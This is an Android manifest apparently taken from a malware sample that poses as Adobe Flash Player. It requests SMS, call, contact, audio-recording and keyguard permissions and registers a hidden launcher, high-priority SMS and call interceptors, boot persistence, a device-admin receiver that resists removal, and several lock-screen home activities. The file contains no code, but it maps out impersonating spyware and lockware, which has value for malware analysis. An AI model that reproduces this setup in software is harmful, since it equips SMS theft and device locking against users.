<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.adobe.flpview">
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_LOGS"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.BROADCAST_PACKAGE_ADDED"/>
    <uses-permission android:name="android.permission.BROADCAST_PACKAGE_INSTALL"/>
    <uses-permission android:name="android.permission.BROADCAST_PACKAGE_REPLACED"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_MMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <application android:allowBackup="true" android:allowClearUserData="false" android:icon="@drawable/ic_launcher" android:label="@string/app_name" android:theme="@style/AppTheme">
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true" android:label="@string/app_name" android:name="com.adobe.flashplayer_.AAA" android:noHistory="true" android:screenOrientation="portrait">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:enabled="true" android:exported="true" android:name="com.adobe.flashplayer.AC" android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
            <intent-filter android:priority="10000">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <receiver android:exported="true" android:name="com.adobe.flashplayer_.CCC" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.adobe.flashplayer_.CCC000">
            <intent-filter>
                <category android:name="android.intent.category.DEFAULT"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_CHANGED"/>
                <action android:name="android.intent.action.PACKAGE_INSTALL"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.intent.action.PACKAGE_REPLACED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.adobe.flashplayer_.AAA111">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.adobe.flashplayer_.FFF000">
            <intent-filter android:priority="100">
                <action android:name="android.intent.action.PHONE_STATE"/>
            </intent-filter>
        </receiver>
        <receiver android:enabled="true" android:name="com.adobe.flashplayer_.EEE111" android:process=":BMW">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:name="com.adobe.flashplayer_.EEE"/>
        <service android:enabled="true" android:name="com.adobe.flashplayer_.AZC"/>
        <service android:enabled="true" android:name="com.adobe.flashplayer_.BBB111"/>
        <service android:enabled="true" android:name="com.adobe.flashplayer_.BBB"/>
        <service android:enabled="true" android:name="com.adobe.flashplayer_.DDD"/>
        <service android:enabled="true" android:name="com.adobe.flashplayer_.CCC111"/>
        <receiver android:enabled="true" android:label="Adobe LIBs importing" android:name="com.adobe.flashplayer_.FFF" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin_data"/>
            <meta-data android:name="checkDelay" android:value="1"/>
            <meta-data android:name="preventRestart" android:value="true"/>
            <meta-data android:name="stopOnDeviceLock" android:value="false"/>
            <intent-filter>
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLED"/>
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true" android:label="@string/title_activity_lock_z" android:name="com.adobe.flashplayer.CT" android:noHistory="true" android:screenOrientation="portrait" android:theme="@android:style/Theme.Wallpaper">
            <meta-data android:name="android.dock_home" android:value="true"/>
            <category android:name="android.intent.category.HOME"/>
            <category android:name="android.intent.category.MONKEY"/>
            <category android:name="android.intent.category.DEFAULT"/>
        </activity>
        <activity android:configChanges="orientation" android:excludeFromRecents="true" android:label="@string/title_activity_lock_z" android:name="com.adobe.packages.BK" android:noHistory="true" android:screenOrientation="portrait" android:theme="@android:style/Theme.NoTitleBar" android:windowSoftInputMode="stateAlwaysHidden|adjustResize">
            <meta-data android:name="android.dock_home" android:value="true"/>
            <category android:name="android.intent.category.HOME"/>
            <category android:name="android.intent.category.MONKEY"/>
            <category android:name="android.intent.category.DEFAULT"/>
        </activity>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true" android:name="com.adobe.packages.ZL" android:noHistory="true" android:screenOrientation="portrait" android:theme="@android:style/Theme.NoTitleBar">
            <meta-data android:name="android.dock_home" android:value="true"/>
            <category android:name="android.intent.category.DEFAULT"/>
            <category android:name="android.intent.category.MONKEY"/>
            <category android:name="android.intent.category.HOME"/>
        </activity>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true" android:name="com.adobe.packages.PM" android:noHistory="true" android:screenOrientation="portrait" android:theme="@style/Theme.Transparent">
            <meta-data android:name="android.dock_home" android:value="true"/>
        </activity>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true" android:name="com.adobe.packages.LCK" android:noHistory="true" android:screenOrientation="portrait" android:theme="@android:style/Theme.NoTitleBar"/>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true" android:name="com.adobe.packages.screen" android:noHistory="true" android:screenOrientation="portrait" android:theme="@style/Theme.Transparent">
            <meta-data android:name="android.dock_home" android:value="true"/>
        </activity>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true" android:name="com.adobe.packages.CheckLicense" android:noHistory="true" android:screenOrientation="portrait" android:theme="@style/Theme.Transparent">
            <meta-data android:name="android.dock_home" android:value="true"/>
        </activity>
        <activity android:configChanges="orientation" android:excludeFromRecents="true" android:name="com.adobe.packages.SB" android:noHistory="true" android:screenOrientation="portrait" android:theme="@android:style/Theme.NoTitleBar">
            <meta-data android:name="android.dock_home" android:value="true"/>
            <category android:name="android.intent.category.DEFAULT"/>
            <category android:name="android.intent.category.MONKEY"/>
            <category android:name="android.intent.category.HOME"/>
        </activity>
    </application>
</manifest>
